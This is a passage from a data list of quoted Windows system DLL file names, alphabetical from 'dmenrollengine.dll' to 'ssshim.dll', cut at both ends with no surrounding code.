"dmenrollengine.dll", "dmintf.dll", "dmiso8601utils.dll", "dmloader.dll", "dmocx.dll", "dmoleaututils.dll", "dmpushproxy.dll", "dmpushroutercore.dll", "dmrcdecoder.dll", "dmrserver.dll", "dmsynth.dll", "dmusic.dll", "dmutil.dll", "dmvdsitf.dll", "dmwappushsvc.dll", "dmwmicsp.dll", "dmxmlhelputils.dll", "dnsapi.dll", "dnscmmc.dll", "dnsext.dll", "dnshc.dll", "dnsrslvr.dll", "docprop.dll", "dolbydecmft.dll", "domgmt.dll", "dosettings.dll", "dosvc.dll", "dot3api.dll", "dot3cfg.dll", "dot3conn.dll", "dot3dlg.dll", "dot3gpclnt.dll", "dot3gpui.dll", "dot3hc.dll", "dot3mm.dll", "dot3msm.dll", "dot3svc.dll", "dot3ui.dll", "dpapi.dll", "dpapiprovider.dll", "dpapisrv.dll", "dpnaddr.dll", "dpnathlp.dll", "dpnet.dll", "dpnhpast.dll", "dpnhupnp.dll", "dpnlobby.dll", "dps.dll", "dpx.dll", "drprov.dll", "drt.dll", "drtprov.dll", "drttransport.dll", "drvsetup.dll", "drvstore.dll", "dsauth.dll", "dsccore.dll", "dsccoreconfprov.dll", "dsclient.dll", "dscproxy.dll", "dsctimer.dll", "dsdmo.dll", "dskquota.dll", "dskquoui.dll", "dsound.dll", "dsparse.dll", "dsprop.dll", "dsquery.dll", "dsreg.dll", "dsregtask.dll", "dsrole.dll", "dssec.dll", "dssenh.dll", "dssvc.dll", "dsui.dll", "dsuiext.dll", "dswave.dll", "dtsh.dll", "ducsps.dll", "dui70.dll", "duser.dll", "dusmapi.dll", "dusmsvc.dll", "dwmapi.dll", "dwmcore.dll", "dwmghost.dll", "dwminit.dll", "dwmredir.dll", "dwmscene.dll", "dwrite.dll", "dxcore.dll", "dxdiagn.dll", "dxgi.dll", "dxgwdi.dll", "dxilconv.dll", "dxmasf.dll", "dxp.dll", "dxpps.dll", "dxptasksync.dll", "dxtmsft.dll", "dxtrans.dll", "dxva2.dll", "dynamoapi.dll", "eapp3hst.dll", "eappcfg.dll", "eappcfgui.dll", "eappgnui.dll", "eapphost.dll", "eappprxy.dll", "eapprovp.dll", "eapputil.dll", "eapsimextdesktop.dll", "eapsvc.dll", "eapteapauth.dll", "eapteapconfig.dll", "eapteapext.dll", "easconsent.dll", "easwrt.dll", "edgeangle.dll", "edgecontent.dll", "edgehtml.dll", "edgeiso.dll", "edgemanager.dll", "edpauditapi.dll", "edpcsp.dll", "edptask.dll", "edputil.dll", "eeprov.dll", "eeutil.dll", "efsadu.dll", "efscore.dll", "efsext.dll", "efslsaext.dll", "efssvc.dll", "efsutil.dll", "efswrt.dll", "ehstorapi.dll", "ehstorpwdmgr.dll", "ehstorshell.dll", "els.dll", "elscore.dll", "elshyph.dll", "elslad.dll", "elstrans.dll", "emailapis.dll", "embeddedmodesvc.dll", "emojids.dll", "encapi.dll", "energy.dll", "energyprov.dll", "energytask.dll", "enrollmentapi.dll", "enterpriseapncsp.dll", "enterprisecsps.dll", "enterpriseetw.dll", "eqossnap.dll", "errordetails.dll", "errordetailscore.dll", "es.dll", "esclprotocol.dll", "esclscan.dll", "esclwiadriver.dll", "esdsip.dll", "esent.dll", "esentprf.dll", "esevss.dll", "eshims.dll", "etwrundown.dll", "euiccscsp.dll", "eventaggregation.dll", "eventcls.dll", "evr.dll", "execmodelclient.dll", "execmodelproxy.dll", "explorerframe.dll", "exsmime.dll", "extrasxmlparser.dll", "f3ahvoas.dll", "facilitator.dll", "familysafetyext.dll", "faultrep.dll", "fcon.dll", "fdbth.dll", "fdbthproxy.dll", "fddevquery.dll", "fde.dll", "fdeploy.dll", "fdphost.dll", "fdpnp.dll", "fdprint.dll", "fdproxy.dll", "fdrespub.dll", "fdssdp.dll", "fdwcn.dll", "fdwnet.dll", "fdwsd.dll", "feclient.dll", "ffbroker.dll", "fhcat.dll", "fhcfg.dll", "fhcleanup.dll", "fhcpl.dll", "fhengine.dll", "fhevents.dll", "fhshl.dll", "fhsrchapi.dll", "fhsrchph.dll", "fhsvc.dll", "fhsvcctl.dll", "fhtask.dll", "fhuxadapter.dll", "fhuxapi.dll", "fhuxcommon.dll", "fhuxgraphics.dll", "fhuxpresentation.dll", "fidocredprov.dll", "filemgmt.dll", "filterds.dll", "findnetprinters.dll", "firewallapi.dll", "flightsettings.dll", "fltlib.dll", "fluencyds.dll", "fmapi.dll", "fmifs.dll", "fms.dll", "fntcache.dll", "fontext.dll", "fontprovider.dll", "fontsub.dll", "fphc.dll", "framedyn.dll", "framedynos.dll", "frameserver.dll", "frprov.dll", "fsutilext.dll", "fthsvc.dll", "fundisc.dll", "fveapi.dll", "fveapibase.dll", "fvecerts.dll", "fvecpl.dll", "fveskybackup.dll", "fveui.dll", "fvewiz.dll", "fwbase.dll", "fwcfg.dll", "fwmdmcsp.dll", "fwpolicyiomgr.dll", "fwpuclnt.dll", "fwremotesvr.dll", "gameinput.dll", "gamemode.dll", "gamestreamingext.dll", "gameux.dll", "gamingtcui.dll", "gcdef.dll", "gdi32.dll", "gdi32full.dll", "gdiplus.dll", "generaltel.dll", "geocommon.dll", "geolocation.dll", "getuname.dll", "glmf32.dll", "globinputhost.dll", "glu32.dll", "gmsaclient.dll", "gpapi.dll", "gpcsewrappercsp.dll", "gpedit.dll", "gpprefcl.dll", "gpprnext.dll", "gpscript.dll", "gpsvc.dll", "gptext.dll", "graphicscapture.dll", "graphicsperfsvc.dll", "groupinghc.dll", "hal.dll", "halextpl080.dll", "hascsp.dll", "hashtagds.dll", "hbaapi.dll", "hcproviders.dll", "hdcphandler.dll", "heatcore.dll", "helppaneproxy.dll", "hgcpl.dll", "hhsetup.dll", "hid.dll", "hidcfu.dll", "hidserv.dll", "hlink.dll", "hmkd.dll", "hnetcfg.dll", "hnetcfgclient.dll", "hnetmon.dll", "hologramworld.dll", "holoshellruntime.dll", "holoshextensions.dll", "hotplug.dll", "hrtfapo.dll", "httpapi.dll", "httpprxc.dll", "httpprxm.dll", "httpprxp.dll", "httpsdatasource.dll", "htui.dll", "hvhostsvc.dll", "hvloader.dll", "hvsigpext.dll", "hvsocket.dll", "hydrogen.dll", "ia2comproxy.dll", "ias.dll", "iasacct.dll", "iasads.dll", "iasdatastore.dll", "iashlpr.dll", "iasmigplugin.dll", "iasnap.dll", "iaspolcy.dll", "iasrad.dll", "iasrecst.dll", "iassam.dll", "iassdo.dll", "iassvcs.dll", "icfupgd.dll", "icm32.dll", "icmp.dll", "icmui.dll", "iconcodecservice.dll", "icsigd.dll", "icsvc.dll", "icsvcext.dll", "icu.dll", "icuin.dll", "icuuc.dll", "idctrls.dll", "idlisten.dll", "idndl.dll", "idstore.dll", "ieadvpack.dll", "ieapfltr.dll", "iedkcs32.dll", "ieframe.dll", "iemigplugin.dll", "iepeers.dll", "ieproxy.dll", "iernonce.dll", "iertutil.dll", "iesetup.dll", "iesysprep.dll", "ieui.dll", "ifmon.dll", "ifsutil.dll", "ifsutilx.dll", "igddiag.dll", "ihds.dll", "ikeext.dll", "imagehlp.dll", "imageres.dll", "imagesp1.dll", "imapi.dll", "imapi2.dll", "imapi2fs.dll", "imgutil.dll", "imm32.dll", "implatsetup.dll", "indexeddblegacy.dll", "inetcomm.dll", "inetmib1.dll", "inetpp.dll", "inetppui.dll", "inetres.dll", "inked.dll", "inkobjcore.dll", "inproclogger.dll", "input.dll", "inputcloudstore.dll", "inputcontroller.dll", "inputhost.dll", "inputservice.dll", "inputswitch.dll", "inseng.dll", "installservice.dll", "internetmail.dll", "internetmailcsp.dll", "invagent.dll", "iologmsg.dll", "iphlpapi.dll", "iphlpsvc.dll", "ipnathlp.dll", "ipnathlpclient.dll", "ippcommon.dll", "ippcommonproxy.dll", "iprtprio.dll", "iprtrmgr.dll", "ipsecsnp.dll", "ipsecsvc.dll", "ipsmsnap.dll", "ipxlatcfg.dll", "iri.dll", "iscsicpl.dll", "iscsidsc.dll", "iscsied.dll", "iscsiexe.dll", "iscsilog.dll", "iscsium.dll", "iscsiwmi.dll", "iscsiwmiv2.dll", "ism.dll", "itircl.dll", "itss.dll", "iuilp.dll", "iumbase.dll", "iumcrypt.dll", "iumdll.dll", "iumsdk.dll", "iyuv_32.dll", "joinproviderol.dll", "joinutil.dll", "jpmapcontrol.dll", "jpndecoder.dll", "jpninputrouter.dll", "jpnranker.dll", "jpnserviceds.dll", "jscript.dll", "jscript9.dll", "jscript9diag.dll", "jsproxy.dll", "kbd101.dll", "kbd101a.dll", "kbd101b.dll", "kbd101c.dll", "kbd103.dll", "kbd106.dll", "kbd106n.dll", "kbda1.dll", "kbda2.dll", "kbda3.dll", "kbdadlm.dll", "kbdal.dll", "kbdarme.dll", "kbdarmph.dll", "kbdarmty.dll", "kbdarmw.dll", "kbdax2.dll", "kbdaze.dll", "kbdazel.dll", "kbdazst.dll", "kbdbash.dll", "kbdbe.dll", "kbdbene.dll", "kbdbgph.dll", "kbdbgph1.dll", "kbdbhc.dll", "kbdblr.dll", "kbdbr.dll", "kbdbu.dll", "kbdbug.dll", "kbdbulg.dll", "kbdca.dll", "kbdcan.dll", "kbdcher.dll", "kbdcherp.dll", "kbdcr.dll", "kbdcz.dll", "kbdcz1.dll", "kbdcz2.dll", "kbdda.dll", "kbddiv1.dll", "kbddiv2.dll", "kbddv.dll", "kbddzo.dll", "kbdes.dll", "kbdest.dll", "kbdfa.dll", "kbdfar.dll", "kbdfc.dll", "kbdfi.dll", "kbdfi1.dll", "kbdfo.dll", "kbdfr.dll", "kbdfthrk.dll", "kbdgae.dll", "kbdgeo.dll", "kbdgeoer.dll", "kbdgeome.dll", "kbdgeooa.dll", "kbdgeoqw.dll", "kbdgkl.dll", "kbdgn.dll", "kbdgr.dll", "kbdgr1.dll", "kbdgrlnd.dll", "kbdgthc.dll", "kbdhau.dll", "kbdhaw.dll", "kbdhe.dll", "kbdhe220.dll", "kbdhe319.dll", "kbdheb.dll", "kbdhebl3.dll", "kbdhela2.dll", "kbdhela3.dll", "kbdhept.dll", "kbdhu.dll", "kbdhu1.dll", "kbdibm02.dll", "kbdibo.dll", "kbdic.dll", "kbdinasa.dll", "kbdinbe1.dll", "kbdinbe2.dll", "kbdinben.dll", "kbdindev.dll", "kbdinen.dll", "kbdinguj.dll", "kbdinhin.dll", "kbdinkan.dll", "kbdinmal.dll", "kbdinmar.dll", "kbdinori.dll", "kbdinpun.dll", "kbdintam.dll", "kbdintel.dll", "kbdinuk2.dll", "kbdir.dll", "kbdit.dll", "kbdit142.dll", "kbdiulat.dll", "kbdjav.dll", "kbdjpn.dll", "kbdkaz.dll", "kbdkhmr.dll", "kbdkni.dll", "kbdkor.dll", "kbdkurd.dll", "kbdkyr.dll", "kbdla.dll", "kbdlao.dll", "kbdlisub.dll", "kbdlisus.dll", "kbdlk41a.dll", "kbdlt.dll", "kbdlt1.dll", "kbdlt2.dll", "kbdlv.dll", "kbdlv1.dll", "kbdlvst.dll", "kbdmac.dll", "kbdmacst.dll", "kbdmaori.dll", "kbdmlt47.dll", "kbdmlt48.dll", "kbdmon.dll", "kbdmonmo.dll", "kbdmonst.dll", "kbdmyan.dll", "kbdne.dll", "kbdnec.dll", "kbdnec95.dll", "kbdnecat.dll", "kbdnecnt.dll", "kbdnepr.dll", "kbdnko.dll", "kbdno.dll", "kbdno1.dll", "kbdnso.dll", "kbdntl.dll", "kbdogham.dll", "kbdolch.dll", "kbdoldit.dll", "kbdosa.dll", "kbdosm.dll", "kbdpash.dll", "kbdphags.dll", "kbdpl.dll", "kbdpl1.dll", "kbdpo.dll", "kbdro.dll", "kbdropr.dll", "kbdrost.dll", "kbdru.dll", "kbdru1.dll", "kbdrum.dll", "kbdsf.dll", "kbdsg.dll", "kbdsl.dll", "kbdsl1.dll", "kbdsmsfi.dll", "kbdsmsno.dll", "kbdsn1.dll", "kbdsora.dll", "kbdsorex.dll", "kbdsors1.dll", "kbdsorst.dll", "kbdsp.dll", "kbdsw.dll", "kbdsw09.dll", "kbdsyr1.dll", "kbdsyr2.dll", "kbdtaile.dll", "kbdtajik.dll", "kbdtam99.dll", "kbdtat.dll", "kbdth0.dll", "kbdth1.dll", "kbdth2.dll", "kbdth3.dll", "kbdtifi.dll", "kbdtifi2.dll", "kbdtiprc.dll", "kbdtiprd.dll", "kbdtt102.dll", "kbdtuf.dll", "kbdtuq.dll", "kbdturme.dll", "kbdtzm.dll", "kbdughr.dll", "kbdughr1.dll", "kbduk.dll", "kbdukx.dll", "kbdur.dll", "kbdur1.dll", "kbdurdu.dll", "kbdus.dll", "kbdusa.dll", "kbdusl.dll", "kbdusr.dll", "kbdusx.dll", "kbduzb.dll", "kbdvntc.dll", "kbdwol.dll", "kbdyak.dll", "kbdyba.dll", "kbdycc.dll", "kbdycl.dll", "kd.dll", "kdcom.dll", "kdcpw.dll", "kdhvcom.dll", "kdnet.dll", "kdnet_uart16550.dll", "kdscli.dll", "kdstub.dll", "kdusb.dll", "kd_02_10df.dll", "kd_02_10ec.dll", "kd_02_1137.dll", "kd_02_14e4.dll", "kd_02_15b3.dll", "kd_02_1969.dll", "kd_02_19a2.dll", "kd_02_1af4.dll", "kd_02_8086.dll", "kd_07_1415.dll", "kd_0c_8086.dll", "kerbclientshared.dll", "kerberos.dll", "kernel32.dll", "kernelbase.dll", "keycredmgr.dll", "keyiso.dll", "keymgr.dll", "knobscore.dll", "knobscsp.dll", "ksuser.dll", "ktmw32.dll", "l2gpstore.dll", "l2nacp.dll", "l2sechc.dll", "laprxy.dll", "legacynetux.dll", "lfsvc.dll", "libcrypto.dll", "licensemanager.dll", "licensingcsp.dll", "licensingdiagspp.dll", "licensingwinrt.dll", "licmgr10.dll", "linkinfo.dll", "lltdapi.dll", "lltdres.dll", "lltdsvc.dll", "lmhsvc.dll", "loadperf.dll", "localsec.dll", "localspl.dll", "localui.dll", "locationapi.dll", "lockappbroker.dll", "lockcontroller.dll", "lockscreendata.dll", "loghours.dll", "logoncli.dll", "logoncontroller.dll", "lpasvc.dll", "lpk.dll", "lsasrv.dll", "lscshostpolicy.dll", "lsm.dll", "lsmproxy.dll", "lstelemetry.dll", "luainstall.dll", "luiapi.dll", "lz32.dll", "magnification.dll", "maintenanceui.dll", "manageci.dll", "mapconfiguration.dll", "mapcontrolcore.dll", "mapgeocoder.dll", "mapi32.dll", "mapistub.dll", "maprouter.dll", "mapsbtsvc.dll", "mapsbtsvcproxy.dll", "mapscsp.dll", "mapsstore.dll", "mapstoasttask.dll", "mapsupdatetask.dll", "mbaeapi.dll", "mbaeapipublic.dll", "mbaexmlparser.dll", "mbmediamanager.dll", "mbsmsapi.dll", "mbussdapi.dll", "mccsengineshared.dll", "mccspal.dll", "mciavi32.dll", "mcicda.dll", "mciqtz32.dll", "mciseq.dll", "mciwave.dll", "mcrecvsrc.dll", "mdmcommon.dll", "mdmdiagnostics.dll", "mdminst.dll", "mdmmigrator.dll", "mdmregistration.dll", "memorydiagnostic.dll", "messagingservice.dll", "mf.dll", "mf3216.dll", "mfaacenc.dll", "mfasfsrcsnk.dll", "mfaudiocnv.dll", "mfc42.dll", "mfc42u.dll", "mfcaptureengine.dll", "mfcore.dll", "mfcsubs.dll", "mfds.dll", "mfdvdec.dll", "mferror.dll", "mfh263enc.dll", "mfh264enc.dll", "mfksproxy.dll", "mfmediaengine.dll", "mfmjpegdec.dll", "mfmkvsrcsnk.dll", "mfmp4srcsnk.dll", "mfmpeg2srcsnk.dll", "mfnetcore.dll", "mfnetsrc.dll", "mfperfhelper.dll", "mfplat.dll", "mfplay.dll", "mfps.dll", "mfreadwrite.dll", "mfsensorgroup.dll", "mfsrcsnk.dll", "mfsvr.dll", "mftranscode.dll", "mfvdsp.dll", "mfvfw.dll", "mfwmaaec.dll", "mgmtapi.dll", "mi.dll", "mibincodec.dll", "midimap.dll", "migisol.dll", "miguiresource.dll", "mimefilt.dll", "mimofcodec.dll", "minstoreevents.dll", "miracastinputmgr.dll", "miracastreceiver.dll", "mirrordrvcompat.dll", "mispace.dll", "mitigationclient.dll", "miutils.dll", "mlang.dll", "mmcbase.dll", "mmcndmgr.dll", "mmcshext.dll", "mmdevapi.dll", "mmgaclient.dll", "mmgaproxystub.dll", "mmres.dll", "mobilenetworking.dll", "modemui.dll", "modernexecserver.dll", "moricons.dll", "moshost.dll", "moshostclient.dll", "moshostcore.dll", "mosstorage.dll", "mp3dmod.dll", "mp43decd.dll", "mp4sdecd.dll", "mpeval.dll", "mpg4decd.dll", "mpr.dll", "mprapi.dll", "mprddm.dll", "mprdim.dll", "mprext.dll", "mprmsg.dll", "mpssvc.dll", "mpunits.dll", "mrmcorer.dll", "mrmdeploy.dll", "mrmindexer.dll", "mrt100.dll", "mrt_map.dll", "msaatext.dll", "msac3enc.dll", "msacm32.dll", "msafd.dll", "msajapi.dll", "msalacdecoder.dll", "msalacencoder.dll", "msamrnbdecoder.dll", "msamrnbencoder.dll", "msamrnbsink.dll", "msamrnbsource.dll", "msasn1.dll", "msauddecmft.dll", "msaudite.dll", "msauserext.dll", "mscandui.dll", "mscat32.dll", "msclmd.dll", "mscms.dll", "mscoree.dll", "mscorier.dll", "mscories.dll", "msctf.dll", "msctfmonitor.dll", "msctfp.dll", "msctfui.dll", "msctfuimanager.dll", "msdadiag.dll", "msdart.dll", "msdelta.dll", "msdmo.dll", "msdrm.dll", "msdtckrm.dll", "msdtclog.dll", "msdtcprx.dll", "msdtcspoffln.dll", "msdtctm.dll", "msdtcuiu.dll", "msdtcvsp1res.dll", "msfeeds.dll", "msfeedsbs.dll", "msflacdecoder.dll", "msflacencoder.dll", "msftedit.dll", "msheif.dll", "mshtml.dll", "mshtmldac.dll", "mshtmled.dll", "mshtmler.dll", "msi.dll", "msicofire.dll", "msidcrl40.dll", "msident.dll", "msidle.dll", "msidntld.dll", "msieftp.dll", "msihnd.dll", "msiltcfg.dll", "msimg32.dll", "msimsg.dll", "msimtf.dll", "msisip.dll", "msiso.dll", "msiwer.dll", "mskeyprotcli.dll", "mskeyprotect.dll", "msls31.dll", "msmpeg2adec.dll", "msmpeg2enc.dll", "msmpeg2vdec.dll", "msobjs.dll", "msoert2.dll", "msopusdecoder.dll", "mspatcha.dll", "mspatchc.dll", "msphotography.dll", "msports.dll", "msprivs.dll", "msrahc.dll", "msrating.dll", "msrawimage.dll", "msrdc.dll", "msrdpwebaccess.dll", "msrle32.dll", "msscntrs.dll", "mssecuser.dll", "mssign32.dll", "mssip32.dll", "mssitlb.dll", "mssph.dll", "mssprxy.dll", "mssrch.dll", "mssvp.dll", "mstask.dll", "mstextprediction.dll", "mstscax.dll", "msutb.dll", "msv1_0.dll", "msvcirt.dll", "msvcp110_win.dll", "msvcp120_clr0400.dll", "msvcp140_clr0400.dll", "msvcp60.dll", "msvcp_win.dll", "msvcr100_clr0400.dll", "msvcr120_clr0400.dll", "msvcrt.dll", "msvfw32.dll", "msvidc32.dll", "msvidctl.dll", "msvideodsp.dll", "msvp9dec.dll", "msvproc.dll", "msvpxenc.dll", "mswb7.dll", "mswebp.dll", "mswmdm.dll", "mswsock.dll", "msxml3.dll", "msxml3r.dll", "msxml6.dll", "msxml6r.dll", "msyuv.dll", "mtcmodel.dll", "mtf.dll", "mtfappserviceds.dll", "mtfdecoder.dll", "mtffuzzyds.dll", "mtfserver.dll", "mtfspellcheckds.dll", "mtxclu.dll", "mtxdm.dll", "mtxex.dll", "mtxoci.dll", "muifontsetup.dll", "mycomput.dll", "mydocs.dll", "napcrypt.dll", "napinsp.dll", "naturalauth.dll", "naturallanguage6.dll", "navshutdown.dll", "ncaapi.dll", "ncasvc.dll", "ncbservice.dll", "ncdautosetup.dll", "ncdprop.dll", "nci.dll", "ncobjapi.dll", "ncrypt.dll", "ncryptprov.dll", "ncryptsslp.dll", "ncsi.dll", "ncuprov.dll", "nddeapi.dll", "ndfapi.dll", "ndfetw.dll", "ndfhcdiscovery.dll", "ndishc.dll", "ndproxystub.dll", "nduprov.dll", "negoexts.dll", "netapi32.dll", "netbios.dll", "netcenter.dll", "netcfgx.dll", "netcorehc.dll", "netdiagfx.dll", "netdriverinstall.dll", "netevent.dll", "netfxperf.dll", "neth.dll", "netid.dll", "netiohlp.dll", "netjoin.dll", "netlogon.dll", "netman.dll", "netmsg.dll", "netplwiz.dll", "netprofm.dll", "netprofmsvc.dll", "netprovfw.dll", "netprovisionsp.dll", "netsetupapi.dll", "netsetupengine.dll", "netsetupshim.dll", "netsetupsvc.dll", "netshell.dll", "nettrace.dll", "netutils.dll", "networkexplorer.dll", "networkhelper.dll", "networkicon.dll", "networkproxycsp.dll", "networkstatus.dll", "networkuxbroker.dll", "newdev.dll", "nfcradiomedia.dll", "ngccredprov.dll", "ngcctnr.dll", "ngcctnrsvc.dll", "ngcisoctnr.dll", "ngckeyenum.dll", "ngcksp.dll", "ngclocal.dll", "ngcpopkeysrv.dll", "ngcprocsp.dll", "ngcrecovery.dll", "ngcsvc.dll", "ngctasks.dll", "ninput.dll", "nlaapi.dll", "nlahc.dll", "nlasvc.dll", "nlhtml.dll", "nlmgp.dll", "nlmproxy.dll", "nlmsprep.dll", "nlsbres.dll", "nlsdata0000.dll", "nlsdata0009.dll", "nlsdl.dll", "nlslexicons0009.dll", "nmadirect.dll", "normaliz.dll", "npmproxy.dll", "npsm.dll", "nrpsrv.dll", "nshhttp.dll", "nshipsec.dll", "nshwfp.dll", "nsi.dll", "nsisvc.dll", "ntasn1.dll", "ntdll.dll", "ntdsapi.dll", "ntlanman.dll", "ntlanui2.dll", "ntlmshared.dll", "ntmarta.dll", "ntprint.dll", "ntshrui.dll", "ntvdm64.dll", "objsel.dll", "occache.dll", "ocsetapi.dll", "odbc32.dll", "odbcbcp.dll", "odbcconf.dll", "odbccp32.dll", "odbccr32.dll", "odbccu32.dll", "odbcint.dll", "odbctrac.dll", "oemlicense.dll", "offfilt.dll", "officecsp.dll", "offlinelsa.dll", "offlinesam.dll", "offreg.dll", "ole32.dll", "oleacc.dll", "oleacchooks.dll", "oleaccrc.dll", "oleaut32.dll", "oledlg.dll", "oleprn.dll", "omadmagent.dll", "omadmapi.dll", "onebackuphandler.dll", "onex.dll", "onexui.dll", "opcservices.dll", "opengl32.dll", "ortcengine.dll", "osbaseln.dll", "osksupport.dll", "osuninst.dll", "p2p.dll", "p2pgraph.dll", "p2pnetsh.dll", "p2psvc.dll", "packager.dll", "panmap.dll", "pautoenr.dll", "pcacli.dll", "pcadm.dll", "pcaevts.dll", "pcasvc.dll", "pcaui.dll", "pcpksp.dll", "pcsvdevice.dll", "pcwum.dll", "pcwutl.dll", "pdh.dll", "pdhui.dll", "peerdist.dll", "peerdistad.dll", "peerdistcleaner.dll", "peerdistsh.dll", "peerdistsvc.dll", "peopleapis.dll", "peopleband.dll", "perceptiondevice.dll", "perfctrs.dll", "perfdisk.dll", "perfnet.dll", "perfos.dll", "perfproc.dll", "perfts.dll", "phoneom.dll", "phoneproviders.dll", "phoneservice.dll", "phoneserviceres.dll", "phoneutil.dll", "phoneutilres.dll", "photowiz.dll", "pickerplatform.dll", "pid.dll", "pidgenx.dll", "pifmgr.dll", "pimstore.dll", "pkeyhelper.dll", "pktmonapi.dll", "pku2u.dll", "pla.dll", "playlistfolder.dll", "playsndsrv.dll", "playtodevice.dll", "playtomanager.dll", "playtomenu.dll", "playtoreceiver.dll", "ploptin.dll", "pmcsnap.dll", "pngfilt.dll", "pnidui.dll", "pnpclean.dll", "pnppolicy.dll", "pnpts.dll", "pnpui.dll", "pnpxassoc.dll", "pnpxassocprx.dll", "pnrpauto.dll", "pnrphc.dll", "pnrpnsp.dll", "pnrpsvc.dll", "policymanager.dll", "polstore.dll", "posetup.dll", "posyncservices.dll", "pots.dll", "powercpl.dll", "powrprof.dll", "ppcsnap.dll", "prauthproviders.dll", "prflbmsg.dll", "printui.dll", "printwsdahost.dll", "prm0009.dll", "prncache.dll", "prnfldr.dll", "prnntfy.dll", "prntvpt.dll", "profapi.dll", "profext.dll", "profprov.dll", "profsvc.dll", "profsvcext.dll", "propsys.dll", "provcore.dll", "provdatastore.dll", "provdiagnostics.dll", "provengine.dll", "provhandlers.dll", "provisioningcsp.dll", "provmigrate.dll", "provops.dll", "provplugineng.dll", "provsysprep.dll", "provthrd.dll", "proximitycommon.dll", "proximityservice.dll", "prvdmofcomp.dll", "psapi.dll", "pshed.dll", "psisdecd.dll", "psmsrv.dll", "pstask.dll", "pstorec.dll", "ptpprov.dll", "puiapi.dll", "puiobj.dll", "pushtoinstall.dll", "pwlauncher.dll", "pwrshplugin.dll", "pwsso.dll", "qasf.dll", "qcap.dll", "qdv.dll", "qdvd.dll", "qedit.dll", "qedwipes.dll", "qmgr.dll", "query.dll", "quiethours.dll", "qwave.dll", "racengn.dll", "racpldlg.dll", "radardt.dll", "radarrs.dll", "radcui.dll", "rasadhlp.dll", "rasapi32.dll", "rasauto.dll", "raschap.dll", "raschapext.dll", "rasctrs.dll", "rascustom.dll", "rasdiag.dll", "rasdlg.dll", "rasgcw.dll", "rasman.dll", "rasmans.dll", "rasmbmgr.dll", "rasmediamanager.dll", "rasmm.dll", "rasmontr.dll", "rasplap.dll", "rasppp.dll", "rastapi.dll", "rastls.dll", "rastlsext.dll", "rdbui.dll", "rdpbase.dll", "rdpcfgex.dll", "rdpcore.dll", "rdpcorets.dll", "rdpencom.dll", "rdpendp.dll", "rdpnano.dll", "rdpsaps.dll", "rdpserverbase.dll", "rdpsharercom.dll", "rdpudd.dll", "rdpviewerax.dll", "rdsappxhelper.dll", "rdsdwmdr.dll", "rdvvmtransport.dll", "rdxservice.dll", "rdxtaskfactory.dll", "reagent.dll", "reagenttask.dll", "recovery.dll", "regapi.dll", "regctrl.dll", "regidle.dll", "regsvc.dll", "reguwpapi.dll", "reinfo.dll", "remotepg.dll", "remotewipecsp.dll", "reportingcsp.dll", "resampledmo.dll", "resbparser.dll", "reseteng.dll", "resetengine.dll", "resetengonline.dll", "resourcemapper.dll", "resutils.dll", "rgb9rast.dll", "riched20.dll", "riched32.dll", "rjvmdmconfig.dll", "rmapi.dll", "rmclient.dll", "rnr20.dll", "roamingsecurity.dll", "rometadata.dll", "rotmgr.dll", "rpcepmap.dll", "rpchttp.dll", "rpcns4.dll", "rpcnsh.dll", "rpcrt4.dll", "rpcrtremote.dll", "rpcss.dll", "rsaenh.dll", "rshx32.dll", "rstrtmgr.dll", "rtffilt.dll", "rtm.dll", "rtmediaframe.dll", "rtmmvrortc.dll", "rtutils.dll", "rtworkq.dll", "rulebasedds.dll", "samcli.dll", "samlib.dll", "samsrv.dll", "sas.dll", "sbe.dll", "sbeio.dll", "sberes.dll", "sbservicetrigger.dll", "scansetting.dll", "scardbi.dll", "scarddlg.dll", "scardsvr.dll", "scavengeui.dll", "scdeviceenum.dll", "scecli.dll", "scesrv.dll", "schannel.dll", "schedcli.dll", "schedsvc.dll", "scksp.dll", "scripto.dll", "scrobj.dll", "scrptadm.dll", "scrrun.dll", "sdcpl.dll", "sdds.dll", "sdengin2.dll", "sdfhost.dll", "sdhcinst.dll", "sdiageng.dll", "sdiagprv.dll", "sdiagschd.dll", "sdohlp.dll", "sdrsvc.dll", "sdshext.dll", "searchfolder.dll", "sechost.dll", "seclogon.dll", "secproc.dll", "secproc_isv.dll", "secproc_ssp.dll", "secproc_ssp_isv.dll", "secur32.dll", "security.dll", "semgrps.dll", "semgrsvc.dll", "sendmail.dll", "sens.dll", "sensapi.dll", "sensorsapi.dll", "sensorscpl.dll", "sensorservice.dll", "sensorsnativeapi.dll", "sensorsutilsv2.dll", "sensrsvc.dll", "serialui.dll", "servicinguapi.dll", "serwvdrv.dll", "sessenv.dll", "setbcdlocale.dll", "settingmonitor.dll", "settingsync.dll", "settingsynccore.dll", "setupapi.dll", "setupcl.dll", "setupcln.dll", "setupetw.dll", "sfc.dll", "sfc_os.dll", "sgrmenclave.dll", "shacct.dll", "shacctprofile.dll", "sharedpccsp.dll", "sharedrealitysvc.dll", "sharehost.dll", "sharemediacpl.dll", "shcore.dll", "shdocvw.dll", "shell32.dll", "shellstyle.dll", "shfolder.dll", "shgina.dll", "shimeng.dll", "shimgvw.dll", "shlwapi.dll", "shpafact.dll", "shsetup.dll", "shsvcs.dll", "shunimpl.dll", "shutdownext.dll", "shutdownux.dll", "shwebsvc.dll", "signdrv.dll", "simauth.dll", "simcfg.dll", "skci.dll", "slc.dll", "slcext.dll", "slwga.dll", "smartscreenps.dll", "smbhelperclass.dll", "smbwmiv2.dll", "smiengine.dll", "smphost.dll", "smsroutersvc.dll", "sndvolsso.dll", "snmpapi.dll", "socialapis.dll", "softkbd.dll", "softpub.dll", "sortwindows61.dll", "sortwindows62.dll", "spacebridge.dll", "spacecontrol.dll", "spatializerapo.dll", "spatialstore.dll", "spbcd.dll", "speechpal.dll", "spfileq.dll", "spinf.dll", "spmpm.dll", "spnet.dll", "spoolss.dll", "spopk.dll", "spp.dll", "sppc.dll", "sppcext.dll", "sppcomapi.dll", "sppcommdlg.dll", "sppinst.dll", "sppnp.dll", "sppobjs.dll", "sppwinob.dll", "sppwmi.dll", "spwinsat.dll", "spwizeng.dll", "spwizimg.dll", "spwizres.dll", "spwmp.dll", "sqlsrv32.dll", "sqmapi.dll", "srchadmin.dll", "srclient.dll", "srcore.dll", "srevents.dll", "srh.dll", "srhelper.dll", "srm.dll", "srmclient.dll", "srmlib.dll", "srmscan.dll", "srmshell.dll", "srmstormod.dll", "srmtrace.dll", "srm_ps.dll", "srpapi.dll", "srrstr.dll", "srumapi.dll", "srumsvc.dll", "srvcli.dll", "srvsvc.dll", "srwmi.dll", "sscore.dll", "sscoreext.dll", "ssdm.dll", "ssdpapi.dll", "ssdpsrv.dll", "sspicli.dll", "sspisrv.dll", "ssshim.dll", 